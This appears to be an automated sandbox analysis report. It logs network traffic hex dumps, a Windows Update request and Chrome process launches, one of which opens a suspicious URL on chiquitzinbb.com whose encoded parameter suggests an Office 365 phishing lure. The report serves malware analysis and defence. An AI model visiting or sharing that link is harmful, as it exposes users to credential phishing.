                                        2024-10-24 01:40:33 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                        Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.164973920.12.23.50443
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:41:10 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zGHyCofktCX+BTC&MD=nWdxdK88 HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept: */*
                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                        Host: slscr.update.microsoft.com
                                        2024-10-24 01:41:10 UTC560INHTTP/1.1 200 OK
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Content-Type: application/octet-stream
                                        Expires: -1
                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                        MS-CorrelationId: 784adb94-a01c-4806-bb5c-0fa231d0e901
                                        MS-RequestId: a89921f6-82b0-418d-98cb-2e8e467dcce9
                                        MS-CV: GUDXlxzf1UGRvNyI.0
                                        X-Microsoft-SLSClientCache: 1440
                                        Content-Disposition: attachment; filename=environment.cab
                                        X-Content-Type-Options: nosniff
                                        Date: Thu, 24 Oct 2024 01:41:09 GMT
                                        Connection: close
                                        Content-Length: 30005
                                        2024-10-24 01:41:10 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                        2024-10-24 01:41:10 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                        Click to jump to process

                                        Click to jump to process

                                        Click to jump to process

                                        Target ID:0
                                        Start time:21:40:17
                                        Start date:23/10/2024
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                        Imagebase:0x7ff7f9810000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:1
                                        Start time:21:40:17
                                        Start date:23/10/2024
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1896,i,5167075357235610977,1307917269125286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                        Imagebase:0x7ff7f9810000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:3
                                        Start time:21:40:19
                                        Start date:23/10/2024
                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N"
                                        Imagebase:0x7ff7f9810000
                                        File size:3'242'272 bytes
                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        No disassembly